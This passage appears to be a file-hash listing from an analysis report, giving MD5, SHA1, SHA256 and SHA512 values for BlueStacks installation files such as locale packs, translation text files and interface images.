| SHA1 | d01932a69626d23e8ce9e9bc240f6d99dd155fb4 |
| SHA256 | ff1b0d50f6f067b291199578b6a7757797bd7fdc6b0ac472c9361076bf9eadaf |
| SHA512 | 98966566211bba402352607a0622dca7f64ad4c056cec2b40cb70572cd1ce5ed92556490b4399a32ed1c04a14d80a3841fd1a758225120ee416c68e9314316db |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\es.pak
| MD5 | 03265b1a7f6a996513067866d55f3bcb |
| SHA1 | 427eecd7810cf24c8758dc9beae18afc9d8969a0 |
| SHA256 | 516234550bfda93687b28c5cb3b7b5362212bf41b900d790ade52747bcf766da |
| SHA512 | d6ace0340666eaffe28f57fb070eb4504460bd47517cf3c0b9c07671a605ec017c4fb45a38fbb96b9c54887dcee639b41ef03b2fd85ed9a666af56dbb73023dc |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fi.pak
| MD5 | f55358f58eb17b4bc6abb19592c1aba7 |
| SHA1 | 6dc1d99757bc5a447b9761a4a0c90a2be521c6b0 |
| SHA256 | cf3b9a857c63022d671f4cc335728c270935628f085ac9a17568a2529daeb4c1 |
| SHA512 | d7cb03ec31a3cd8c7f13e1bae1439fbba3b76636f1f254ba5376c5da82b9a98e93684fc3cab3bbe8a4c892ba42f17c0db1eec1531950e17932aee16007081aab |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fr.pak
| MD5 | 75575474726cc8d98def90e0dbddcb0f |
| SHA1 | 3e62e3b73bab73597a01c3ece5871c64b142391f |
| SHA256 | d37509844342371b4026b720dc00f77ff88fe2e7c2b27861e3ca66b10e76ca94 |
| SHA512 | 37e8e5cc44ee4433b0206cd1baedb955947d0fdf172e69a28fb7bc09f2a57c4f27fb45c12a0a49753281cb2e2a92792b67d568f3cd4f90c9c87337249d031fc0 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fil.pak
| MD5 | f5257136ed900e1715979c9a96de292d |
| SHA1 | 217cbe02931f6466bdbdb27c85c876b851610b23 |
| SHA256 | 98a20cd0e9fae36f22de4a4db7b515532b4327e6d475d4e39ae93ea45b76cd90 |
| SHA512 | c38828d2736ba26ad0bff9976adc9d3910df7a417aad8cf6e3cf6383688a56ad2581cbda520403d44b010562b56d6107211385fc80988ac57e930199415ca654 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\he.pak
| MD5 | 8c02d30c68c4abb4b1a7c2493d8fde51 |
| SHA1 | 2cbe2f537d59971296f2180d146d9c2905d2a76f |
| SHA256 | e37f0e2516799f320e4ac1a872d0ab7108c4f63d9ad33a17a4008923c7f93e9a |
| SHA512 | 9155cb07b6a23d7f73bf8f68af44ee3bc1e25c6ca643c2f8d64a808d3f78076e3ee60f68d3be9cfe3a6dcfbbfd4595e58c897cb4f8b92272e8ffb443cdf6f3a6 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\kn.pak
| MD5 | 2e9a1e91aa149308dde43e0b357e1c8a |
| SHA1 | d657811a3b3dabe519fb7b5fad46977674234f51 |
| SHA256 | 2a0411a1368fd5f342581b00fb3b451f89ad593fa49f0f79fd9abd5ee0d5f5e1 |
| SHA512 | d7b612562fb04a89dac28f51e691f42af39cf61bbd2199c4f652a3096330a99084c0f410bf0c449403031b9a264769ba2932cdae8b0c49bcf92b5ae7a4e8fe9b |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ms.pak
| MD5 | 901240b9cb3a7a635c2d56d6ff1b3966 |
| SHA1 | c1fdd4ccf213bf1822696061d64930f47a017cdf |
| SHA256 | a750d091e4ca00bdc647ca36c2a22cf9199126c69607fc14f468f6b3b588e55e |
| SHA512 | 2b316bc8d5f27f6f90434fa61d270a28f5aef2b9808b1467697c5671aedcfd99d7cf99d72f11d05dee06e73949ab2b22627ea1e925ce8b1ec65b4cd43d03eca4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 488aaa3520a6c3698e340deef948d248 |
| SHA1 | 0146bd48e75a7c4462f2d281122aff20b993af6e |
| SHA256 | cdf3bf040321d57dfa42d73afc009f36f6b6e573d814baca9e5e4af4e5809e30 |
| SHA512 | 41a00f6de7d3ef7df3d0a38e7fbf40658aa6eed3ce61e1b4c4d33314d2962fd1e0522a1f63def7546463e4be1eeb322f11a91553eb825b4ed9593629f6727944 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sr.pak
| MD5 | 97ef86fc3b66a0a3aa4e1be4555369f0 |
| SHA1 | bbe68527d0c4c9e6624920d548c0ab0c09dbac88 |
| SHA256 | d5a48e324fba0fe6ad0b08da12fa2f4b9279b6271d36710663b3462794a0c7fb |
| SHA512 | fd7802060a8891df3ad2df1252e0fe09f227c7ca81715917fe0020277d28788326d9798cb62acb8820f4701fb18627f78b6d22d9ee8ee402abcfeb4704718ef3 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\zh-TW.pak
| MD5 | c709c2e92d4c0a1a2fd30f5350bed636 |
| SHA1 | 31c8463300bdfe0238f167451a1adffc4fa899a3 |
| SHA256 | 37a8707ce5a07b4363579e2d411a1c641913ed1e0377ae1e8cdf70146cee889e |
| SHA512 | 38f8da72ecbf73f10a8109ba51f162e77b0f567f7415fe2fa17a2bd7677d9562ff8bd5c136251f44c192c7618cdf72684dfe11070f478255828a5bcc5df8c01d |
F:\BlueStacks_nxt\Locales\i18n.zh-TW.txt
| MD5 | 83cb955054b8fe7ae37386d91b22f685 |
| SHA1 | c89a0a41d22eec4761e9b57b0b2dde2d29d706d2 |
| SHA256 | d1e342b3a4a8f0d982e308f7c12103a402d636c5723e9c0ed810c5b25bce1814 |
| SHA512 | 59547e6947f0f32c4cd5ac04f238180ae5d13232401ce73227bf5635e5a957e78fdbd4f9ccdc34358ee14ea0779834979fa4a523c5e3125aa2528e01c7b692b2 |
F:\BlueStacks_nxt\Locales\i18n.zh-CN.txt
| MD5 | 7fe6e9ba41b3d6b43d03bff14964a93f |
| SHA1 | c0b47f0ac6e920e32f969f4f6b07a649493dea5c |
| SHA256 | 203f2e9f9f72e575335f4d93101976f46b0361c06963dd414986a91678dbcc3c |
| SHA512 | d72a11132c6098cd5bd2e06e7b9ee388e09b33b3ee1e56921e2ec6af7dc9b9ebac48c02802045b1f1899a0cbd5ab94512e52964324165de10d68163cfecf05bd |
F:\BlueStacks_nxt\Locales\i18n.vi-VN.txt
| MD5 | a899623e80eaa446ffdebd64d5a8f7bc |
| SHA1 | d5fc1c3e23e5fe11fa549dff385bcdca87c06a7e |
| SHA256 | 44a648a98709c846b9e3fee5b9ed6bb4a1c3b26a33ee9d9c6e589911063322c6 |
| SHA512 | e8c039bfdc876b54cca0c492d2c1e036c9c2a9597305b30ca07dadc85ebe4da5cb67effd2871c4ab4aaa2ec6d22cd6e3e54b771ec5daeee2c3e8eb9b9d666085 |
F:\BlueStacks_nxt\Locales\i18n.tr-TR.txt
| MD5 | 2b5f2c757a4d42de2f98e31139b676b2 |
| SHA1 | cd40cc682b112f60c6dd460596cffb3b994bd882 |
| SHA256 | 598ab5abf69d1de2c04e6e7fa807606f4a2924f966fa0c373fef99a474244487 |
| SHA512 | 2055d884d2e39962801f1c69f997d58d6db5fe01784cb1202cbe72973a48f8bfc399642fd46d28dda9d56ef5558aab32b341d79ff7d0920af7f4769ffd986d08 |
F:\BlueStacks_nxt\Locales\i18n.th-TH.txt
| MD5 | c964784c1444bc7e9488acdec13990bc |
| SHA1 | 9ca7ac8a620fdb37aaf21fea1df37e388dab6eb1 |
| SHA256 | 889ee3e31b027985b05bfd356470baf62a221617f37bdce444f2b60f7bb1f91e |
| SHA512 | 903f4554e0b2f602186837f39158a52bbb035d085cad49c03b8614219e22469eb63e9390e101c3312bcdca0751134accd37e0ed71d3db8eac096dff5a2b9e3d9 |
F:\BlueStacks_nxt\Locales\i18n.ru-RU.txt
| MD5 | 5e617de676c07bb3ab766d5678df38a4 |
| SHA1 | cf69fc6e6c0b6d3a9a6bb6934b18752cb722b14f |
| SHA256 | f07976072e28b0fbbf9bfbabe60f843874d2f72cb9ac76bf2980c1a8208a3793 |
| SHA512 | 997178e8d5850b929d3f870036000021c17c3b28d73991dda7e0408b32186e328c08b1eff4ff76bc9d8567c07a1be0defd44fe0ab925d561a5c3b95386051009 |
F:\BlueStacks_nxt\Locales\i18n.pt-BR.txt
| MD5 | 1a8e659bd29df24b5001a1f687e21be5 |
| SHA1 | f6c4b1cda1bad81f23a27014d3a77d4463afd6a5 |
| SHA256 | 1b8232e35e0ac3a96f2ab402b5ff205f92b036174977b8a304f45491a67d5031 |
| SHA512 | 19c5fbb3d827c5d590dde59f4f91c06e89db17c970f30e774ed68f353968930ba3db148fff2ade6e5357cc70d530458a64b9c40ee12e2baace3adaec527ef3be |
F:\BlueStacks_nxt\Locales\i18n.pl-PL.txt
| MD5 | 54f8558a0112610cc516958482672cf7 |
| SHA1 | 3422b440364816c7e96d7f598e03df90b8ab74a3 |
| SHA256 | 783d0131154663e7fa6b069b5ad5d3a86d94f4e97b5a58b88f71a1912bb9eae4 |
| SHA512 | 23507a21e88574980f6de8905dcf6099346c5160356889675b318c575ceed9274d65574d882ae32936958f9f4810556a650467069e52a978efb03dd208ea2b3c |
F:\BlueStacks_nxt\Locales\i18n.ko-KR.txt
| MD5 | f13198caa789feab1906e69736d1bf8e |
| SHA1 | 6087394d95723256c9eaa084cbbd03b800b8a7ad |
| SHA256 | 0a9b0ecd030084ad3f48791e991a9dc4d6bd78c1245db75ff7e48f33f8578986 |
| SHA512 | 3b8e4f9b9395a2b512fa460845a5f4546971a31e1203d81c078955b5361888ad70176f143f50c9b963b0b4370c66ddfff3a7dbedb0a0d47ad881f8a6af44d2d4 |
F:\BlueStacks_nxt\Locales\i18n.ja-JP.txt
| MD5 | 6977d12f436990c3f655c22bb44566af |
| SHA1 | d0a04169354ab49104bc123e90494115dbd1539b |
| SHA256 | c7b19642434a9e918003564b30cfbee5c0710463a74cb7fa86f9da2334d6d38c |
| SHA512 | ff9ee652a79379cbdd7b2974fb6f61f4efaf2b73a79b28bf86b34288c42ccc343039110f5abd2c50ebe13f080e6f5eeb9196ba7eae3c61a782f6971d914a996d |
F:\BlueStacks_nxt\Locales\i18n.it-IT.txt
| MD5 | fe2d985f41007a88d8f0fd8eab5d5d8d |
| SHA1 | 4d48113cc2284891828b4501367e780970334bcf |
| SHA256 | 41b9cc6ccdb90f6141eadee8f757cefe5f536d9660d777a4a77b597421bb144f |
| SHA512 | 6441405d76fed023a78c34a4752def7d242894cf05bc9e06bd795b106b6434c1893367af6bca73f77d6f737fd6eb9c687464cde18b609c2a3d82d2be07a270c0 |
F:\BlueStacks_nxt\Locales\i18n.id-ID.txt
| MD5 | f4875d3c5153bf3fbf73725c420c83dc |
| SHA1 | 56439c46ee459f4b456a5bac38f68a7355947194 |
| SHA256 | d6d18da6a56863a10458ddf94265525ba13ad4fbfa84a169ffaf7aca20a0370e |
| SHA512 | 792a66019f9f7180eafd63dcafa30109e7b89826fadae2b38d86cad35146fb8d53d3df2b02e9eae971d13cea37d7d9eb66a699366d95eb7abc235e577a356117 |
F:\BlueStacks_nxt\Locales\i18n.fr-FR.txt
| MD5 | 3ba087f6afff180795610e8ac5bb5aaa |
| SHA1 | f2d5c5f10694e51fed09d5b3a0397561beb331f9 |
| SHA256 | d2d2f4d6e554132fa86d0bfa0ac1892f10f53f30638599b17979cadb5d011f4c |
| SHA512 | f9bbce232b486b51352f6c0386e515f0824b0b0ba56400e3f804f322b0a7e90e73b6917044bb8e0eb37509a0b4bdc1d37deeebae43547b9d8f35d2f34d5f55e5 |
F:\BlueStacks_nxt\Locales\i18n.es-ES.txt
| MD5 | 67f8aef2c5208468ce113a47edfedb4c |
| SHA1 | 4d482c81f65dc7c7b23a6dd2cdaec0eb7fee69fa |
| SHA256 | 341df1d9ce68b161f1728bd466dd9da64d4723530f3bc0f7fa66a3dba3825917 |
| SHA512 | e3bd1e8b69fc28a257e9024bc0b783f161c6574e5f9aab9737c02a2c4b1ebca59cc761ecc9ef3c08e62a1f325072164899ae9c984f37bf385e05fc011255857d |
F:\BlueStacks_nxt\Client\Assets\radio_selected_hover.png
| MD5 | 47ff3e4cc15b8c4a07e3ceb6cb619b62 |
| SHA1 | 0318e54c613b8ff00f54d843e90ef88310c1a96f |
| SHA256 | 4786cfb7c98edcf01d6b670abf19c50891d56a4de87b96a5e17be142b1af666a |
| SHA512 | 0212bd7f6cee390d3bc221a22189b75407fa660a0951c7f768645bf97e7b61ee86fa9b1de6f546ff1151560dcb3b071db8c14a7b08b0e771b539a817b31b154e |
F:\BlueStacks_nxt\Client\Assets\radio_unselected_hover.png
| MD5 | 22efccf38e15df945962ac85ac3aa3b7 |
| SHA1 | b94a8615dc92982e1637680446896080f97c2564 |
| SHA256 | 0ec39ed4bf89a341f1b5aea56d0e99ff5c923b9c3a6a81adeb9ff21764136f92 |
| SHA512 | 41a4dbb57abed1a16aa84c72c202da461ca45cbaf68f69a10cb3e5529e8dff659e89f7f4459d1e2e8f3549c6fd51f23fc8422f86667577ebed5ab5df149c79ee |
F:\BlueStacks_nxt\Locales\i18n.en-US.txt
| MD5 | bc0bfbf0fa8b40c2f72957c2f57afb8f |
| SHA1 | 644765340a713413e159ff57f0098501ca8304f4 |
| SHA256 | 819b673bc98a9aefa9e480b3df2a5f9558033fce38c2a2f5be08d10b9a859e28 |
| SHA512 | 6e7e88ac28190011c1e1e2a78517e3bb858e35ac90f125882c64bfa26d5a6f7ee6718c558b9446f3aeead0a8fc53c825fca66ad2f6d82819ede19b88ff658e3f |
F:\BlueStacks_nxt\Locales\i18n.de-DE.txt
| MD5 | 995c4504c8e8e71b372e6d9b64b070f3 |
| SHA1 | 9ff5eaec585c416446c3f7ad7f3985f42cdf6226 |
| SHA256 | c28bcb07bdf32e5221ce919354cab0349891dfcbb87540f241fb3f58cf9028b7 |
| SHA512 | f1fc68f8bcf923f4f682eb30ea980e6da36355eff9a8ad7eb93d558d96e831b19dbf167b2e6d2287c6532c2b2c5591c66191d1005ebb0d56eb1647904b804066 |
F:\BlueStacks_nxt\Locales\i18n.ar-IL.txt
| MD5 | 9fb07e066cc2f213a64d35a97a8c2922 |
| SHA1 | a70db989f5c562bc69caad89a1402c8ad7c9b80e |
| SHA256 | 65e7b0f37b5e2aa805ac8d57969804d803430186f34e9703ca9fa09ba908ef90 |
| SHA512 | 81680bff55b475a62a4bf29a8c219230b84894c1165f60e372209a5aacdba8e4819c3dfb76f3b55c15d472ababeabf0cd4b30c04e7daa26df63c8a5101970c3c |
F:\BlueStacks_nxt\Locales\i18n.ar-EG.txt
| MD5 | 2cbe2f0936384cc7729ca9b15e869955 |
| SHA1 | cbd351ef412b7fb52e2ac582f4eb58944020ee33 |
| SHA256 | 057074129e8f390aa07851d6eb59e892440e7994c4c6f3b78618e7fb6f07ca92 |
| SHA512 | fb9e0fe5b138df8e36f334bcf7e4cc7c024d2d8828b63486c3ac19c8279e0e9e09d82d391b536eac0e52160992dc6bc3672523b5edb2cb63d7a96e4128b48b39 |
F:\BlueStacks_nxt\Client\Assets\exit_close_click.png
| MD5 | b09525b48c0023f893d6b64d06add4b1 |
| SHA1 | 10ecd439ea04e02eefe17f6c110d0c0a78a1db21 |
| SHA256 | caa2a8fe9b282939a21b86f8f61fb0c9452222cc3409f06cbb0dcc45613aca8e |
| SHA512 | c6f5a7014c24133eb576708ca17d15becf2b45ec278b3f94e5275e47c78cf0f2eb8bb1a17d277d1a665039f38f2e25faf830e275f426b0a94c6a3da096b6204f |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\zh-CN.pak
| MD5 | 54415acf2d54c65718c99ed78b4bf3e5 |
| SHA1 | 311937480b01256a1e50d0556df9b4f9f9a46424 |
| SHA256 | 3648945ec3205f590da62f76af957d8a4175890e6ddb5fd1103beeaf66728c7a |
| SHA512 | 4eba5d0f1be81e72699d8429252877096524b4e27fd7d8ac480ec13cb60a83f4b8288823299c1c4e210699278588662e578814b8061bd5b72b5179b956624fc9 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\vi.pak
| MD5 | 561050669f78bd04d0431de3eb98d160 |
| SHA1 | 028a78bbaabe19ac338648ac95a8b944254e8d3d |
| SHA256 | 922eb514cc20dbb44f41745c9e793756f8b46892504207e75de188be0aca6333 |
| SHA512 | 2df7ff472a616c9271da813a66c6bd98809d788c7dc752ff0f3f68423f245cadd6945a5424af740b17d14f4f6935a2f2bf030b369dc8a39fa6e968d7f2a1897d |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\uk.pak
| MD5 | e21f45d7685b75be483013e1e8dc8237 |
| SHA1 | 8f4cdd3dea580d7671117e9c49891212ab950686 |
| SHA256 | dd57df6e7b591b3bd6663743c52f4c5f3a7a24e90fd8045b03479707f25702b3 |
| SHA512 | b29d8c67a259e4221e9cbb082f41a1b008f665e18dac568c7ac75fd40ee1e1e00df8bcd65825fbac63d51b1bf555c5c3752b96a9c8a4a153cd325377a165a048 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\tr.pak
| MD5 | 1a505f3f30511c2b05eb29ee0e0bff26 |
| SHA1 | 08d4002d32dc5ea8a9476495786f5d5c1bae7ea6 |
| SHA256 | 27627a61c6857b80b5eec4f6720b585f82b38271b7470c00a444735beee254e0 |
| SHA512 | d925f59cc9af4d55ad5daee42094ddf5d120eae816cddb56e906cd8da47039502f7608e9c4af77994ee7db585697fb26dbbd1c2e7c0bee4e3b194c9eee80eeff |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\th.pak
| MD5 | 433dbeabe2d4c70255f1685ece8fb97b |
| SHA1 | 966c16c364b4f3ae6ccb8c5019c0b6bca75b593e |
| SHA256 | dedb178d79730bb0282605f7bbc6e410b03ee7bdcee1a64c08d9e9c442f49942 |
| SHA512 | b5f3d434f71b62136647700e7d4c4e207bafeeb20cdb03019c6cd6580e61f88f596a4f2a0ca77b010f38b41a3eaf5df8e2a00e06764db17244083cb95703213c |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\te.pak
| MD5 | 079fbd6adf806504199dd0b05c87c697 |
| SHA1 | 4fec8c3bae9b48f92e35b609fc3977eda5de2039 |
| SHA256 | ee2697e8850803f08bee80e461833bd9f4232532c3f569f56521b1320c99e5e2 |
| SHA512 | 722c6f3f6f61a8eea6965eae290e580a3263b894e07f7aac08fb6cca67e668db92a874728e32764ee0c10f5307b753d1589b8cae5c8a39edb29c7253591c017d |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ta.pak
| MD5 | 48554783d89587fe96d94cc1afb58248 |
| SHA1 | be0843e27225df82cbb27f017acb7bac27c92c5e |
| SHA256 | df0d976ad84bd0dc165f341ca9c5dfe7995a4f676c1c0a09d7a4716747e94896 |
| SHA512 | 2ec38646a550e86bd6634247de2a49be20e9f3c09820284da82f7aaa6ceabe32920c4395d3bcd728e3370f8342627a9a9f12b6a222de145213efe57239183784 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sw.pak
| MD5 | e99bc71c3caeae580ef7060155ddd0ff |
| SHA1 | d6986e1fe1dd6c110b05f44f84e956ecac188b97 |
| SHA256 | 4282f200af58345ac756dbf88d0b898d26750f5aa16b7d2557b4d31c0ec126c8 |
| SHA512 | 6bef16c9633387a3a0557cb644f152210d75157ac9b8ab1af6b94bdbdfb48b2511d0adc84d269ad16a439415ec46b78ff9a2e743bf72238cc5f25a4ce5bbd7f0 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sv.pak
| MD5 | f2bf46d97477489d80659d0be53d9d05 |
| SHA1 | a76378ec45dcdef0c596aebe8a4cf36dd3f9c01c |
| SHA256 | 196265eea8a2d8746953564b11d64dfc38acc9b17d3e38965f3ae1ba78841e32 |
| SHA512 | d65d27d04beacb20d3367af016ef55bea774c782475271e0a0573d2bff2912835d96a803c216ca5f43b56d142e6a77b41a67f35c5bc704c10f5e2aee5d6b7348 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sl.pak
| MD5 | 4138dc422fc6a5afb1a855ffe0caba32 |
| SHA1 | 8b23cb3c91167908e181eb0ce9d730ca5b3179e7 |
| SHA256 | 7904fb9153a65105690d76ebda6e9edef2852b868f6a8d2e989b2013d40ffc3b |
| SHA512 | a578919421c6458fd187d5985d721257cfb7bc3404f174dff413c211f29cb2d4552699fe10f0c01a651e224c1c7f3189706aaf71107187120a4260214881e531 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sk.pak
| MD5 | b37b81799942fc174e05b6aac03ea4c3 |
| SHA1 | 788d6d10c82614465628f79bbe1f2346839a582e |
| SHA256 | 579a167528badf2a6feafbab487bd2314dd6107d0cc87df17a88ae325ef16319 |
| SHA512 | 31bb82eb4434665a1b22a21e3e91b48fb2fe78913aac18475f8f328f05fafb2e4bffdd1565b8f48c67061fbf760ad217300882b5871d1753255d969be2b49b44 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ru.pak
| MD5 | 3d28ef9e25426b08409db5379cfd55e3 |
| SHA1 | 25fefc87d6233da5b287dbbf04a63c34cb9c5571 |
| SHA256 | b81a0b0175225dbdf35150dcc0c36154cfc042c1525df216d68034f0ae609057 |
| SHA512 | 210b8bf28519c1e1576dfaa76260ceb6fe5dc46d23a6c74f1eaba9e08abb310b34989f0e667b6839999f765cb9bb77d35636db63ba082d471c6b73819b357995 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ro.pak
| MD5 | 14ee5c1a362e753a5c44b11343430fdb |
| SHA1 | b87e4750d5319c5c695f1581feaacdd71abe0cda |
| SHA256 | ac3134a201073f6482a4cceb29a745104325ac76b7ad0d262ac7567584f450a1 |
| SHA512 | ed647aa3f3ccd5033e41c8cbb8f85d1bd0dbf783472668abb9a7e83ce5ce05706b9d67d5cfb4c28791414e77b5ea9ca5335189545ee79475d3f7cf58c1f12377 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pt-PT.pak
| MD5 | 0db54f0f25ec3a19dff541ba223bd5b4 |
| SHA1 | dc1f0c9b1c2578490af5923df179a92814c04904 |
| SHA256 | ff89da2b21c03475373f3839615c570d15b9929fa2cea991105915ef4e648d69 |
| SHA512 | 96060c6c548085f019f3f127c4250ae6620c2b4f206da9203db94a7d2146c945b5384a661494ad886ceb35cf3f45500302b01009e08b43e549e17ddc318bc48c |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pt-BR.pak
| MD5 | 4792f1e39c6875d8aa5e911f16ed638d |
| SHA1 | c04ecb497096be4173f9aae3f0ae6accc8324156 |
| SHA256 | a39bf79dce50c0ef227c3f326728d12c7675a79ab5d4b891fc56913bcbe83e5e |
| SHA512 | 5fabf0e030f94c959eac797ae401f28b76ad63816e88d26e3875168978d7448317e3f86aa99b15c0ff266505c5dcb30124c796c6c46c0b90e09ce21b77324d69 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pl.pak
| MD5 | 41ad390a8cc5fbd5b1f352e838b42ce1 |
| SHA1 | 9efa8f2e5a0312e83f737929765a86112a874272 |
| SHA256 | 979c4336b428df84e37a2a51a7c5f311ac33ef6e4edc309c138ab2866dd065c0 |
| SHA512 | 1beb3c66c5b4f9d128e8badcaa8b9dfa9908d74ea910c40a7cde8be3b9b704525e7ddf1e646013cfecf7c66585975b8a8e640b43b27771335bbaa90158f45d01 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\nl.pak
| MD5 | 884f7faf0e79d04c6536506d6f95eab1 |
| SHA1 | 39334913aa447b35012a8d7100e7f91e805c7e9d |
| SHA256 | b4d9d873df0ab126f4a312755fde331d4d246519f1757f32087b36714ef4249f |
| SHA512 | 77a4379e148c7886950b92bdf8959c12c8695b7121be89142f4d4190cf32c43b8accb77f0c40718cd3c7e3ac0f90e99f3dcf5992140a5769821fc2adac988e18 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\nb.pak
| MD5 | 5c901b43287edab65f05464dbad3e301 |
| SHA1 | d76444677a7eeafdfe0bc27a0ff892f028144d67 |
| SHA256 | 0bdd86ed3444e7e5508dfe4ec483673c2744925accaa5529bff4037cd1b0c2ed |
| SHA512 | 46fbe41905a44fe034f3b0798459a2b5bfb4ac408bb90fb5f0f9e82c91407e4b6eddaa82173c0926784881acee514da71284ed02decb49d99cb235784d072da2 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\mr.pak
| MD5 | f40f6817a07049b8589310b7dba04534 |
| SHA1 | 93afea27adbd165aa1e3261cb67d5ab719ea02db |
| SHA256 | 5429e2696d32638253c4372cc427b3fa154d7c997dc13aab90411fdf98c8f6d3 |
| SHA512 | 450039cebfebd9b5dd012c2980587e78b64e777bb2ed7cebd1f3174b5e88f0a018cbd60af18ef3eaeeecf9729b420a0216a0b167867be4a2814744217bbf84e6 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ml.pak
| MD5 | df01088842b8c05568fce402a69bb595 |
| SHA1 | 4b97c244ee85efb9c35b69f65f64d9cfcb2d25aa |
| SHA256 | 9f1fe59eb3d0da8d36715d63da958b5773ced3967e04c5314b3d5aaad2f3c579 |
| SHA512 | b434a12884f7a1d417c02de2fd27955e6af2329d8d8d0db9781675a16396556b89e2f46dc951e070c4077073e126d492a5db7a077b7ac3b1f80fe4fab4d68125 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\lv.pak
| MD5 | 17b9ff8c299fff962e9b9bc0d5f2f15b |
| SHA1 | 6224d9bf81c4771033e14477da0a652336326036 |
| SHA256 | 7e4a42d3cc06b7c9cfebad08391de3a275ec129ac20d36ec90ac136ee88223f0 |
| SHA512 | 8bd3f102b933b94cd0da09e77c78369a156e2ac22f29888ac0c9db8d9d4e2a7e4eeac99942ae7a8785c6207a0277c374c1727712a932922c10646e3fec609963 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\lt.pak
| MD5 | 7769b6273b1519ea1a8ac9f059e78c93 |
| SHA1 | 6d8807f4af484041bac83d5d8873d639d5f07d0e |
| SHA256 | e88897c766d8746b9ad859123742dc84b4dc9e6bd05d10a9262b15055a67758a |
| SHA512 | 9c91942cb73bc0c2dfdd94a93759520d9a3ac7f6b43ac826d00d2ff46c6335ed87126024bfa955e9c9e744d437a832188d66ad238ae66378a23210b9d1e740ae |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ko.pak
| MD5 | 2a0bc83152bfbc0f365d3a85fd1e1832 |
| SHA1 | 9b972a8e823ff6f161ca2aadac11043b054b3146 |
| SHA256 | ae1cdf9a4cef3a86d3550f7501e5c650cc1e0924c9ab84900df702ea7e351f8f |
| SHA512 | 2c3ae97d3c78310cafe92620c0438dde4c624353cd682f3087c92050870d768e6f7071248e55d03232739a2dd94c7694975b0b329f1ffc6148221a18effa9088 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ja.pak
| MD5 | 9705a8fcead214aa619f1be816135ea0 |
| SHA1 | f10d22cdbf5d7960aeaa13c98cf8f7de41034760 |
| SHA256 | c8db5560edd42f1a6acc4efd10865ce39c15dadd3b7dbdaaa28922e1f9c86320 |
| SHA512 | 6d82ae6023e48ef54d6903a13b6f07069fdd5c87aa0e7b1219c0797bf49cc789170b3677d572fb1b63feda138e624f71e7175022eb7928db0dd413cc8652c6af |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\it.pak
| MD5 | 56c13472d7efdb4466d5189af2d06ce6 |
| SHA1 | 84025c148e10e1885125893dd286d0f9e751e101 |
| SHA256 | 7114d3e0c7de30f25c789a1dcc7c50e85985b8ff35afce4600128e85318b4af4 |
| SHA512 | fa9b17d387585a281ef1582b8596cb61dc79658bf3b121f6fb6355bd6584c517d938e21d1a0b1be6491c01e5c15c2da666d9f77000a12a2da137c040046957f8 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\id.pak
| MD5 | fc2cd7f4af1976579f6b0eae3ab2d874 |
| SHA1 | c4e434b9d0d95a505947c97d396b05c9a18f3983 |
| SHA256 | 48b670c94216623a0c81ad611cc3b47a47dc9368215e065fd02448b4ebf808ef |
| SHA512 | 9e355bcfcc31535755233cdd7a521b0bc68f897d85a22da658e3fe5bfa388ce8d8dfa7c01087ea04cd268d44d43862c5acf5b305e45b4572dcb25884e45a4535 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hu.pak
| MD5 | 3c70ba470c8503cae9407540d070f506 |
| SHA1 | 0b841228d28e8605c37df79f1a3714402d2b18df |
| SHA256 | 0770854f32f041df5ee0190164aa24a1ad06e199c79efd46f3ab65e12129023e |
| SHA512 | ded69524127431d1b6a68bcf85119079a57d3aae5c5be7fd8f215090ecc74570b899e8ec70d6cf74da49833d903f8ec2cbb06738a1c917efc5e19a44167183c1 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hr.pak
| MD5 | a621446d9e94b0d47935bf3310c385b5 |
| SHA1 | 5cb954846bd2a2c477cb28b99545cd9bc0fbe990 |
| SHA256 | 93f7fbaf2c7e5f52187fc4a2b5726387e84decebd1efd8b922665bb831e5b842 |
| SHA512 | 80c5ddea81bf8d1721a2c6cf094cb2c99a10a9aa443193bb2942360de9783da75292eaa341711700281626cc0c8a8f9dc071bd8bb589444f764ea307c4b9de37 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hi.pak
| MD5 | 61838bdf13a1d60545d15e9cc49866be |
| SHA1 | 64bec7fe42caf53f192b58e4e5b068e56d835cec |
| SHA256 | 9a399dd9dac62ea30d700f94e83dd79d54827eac8b9cbce0343ad2dc0f4809a1 |
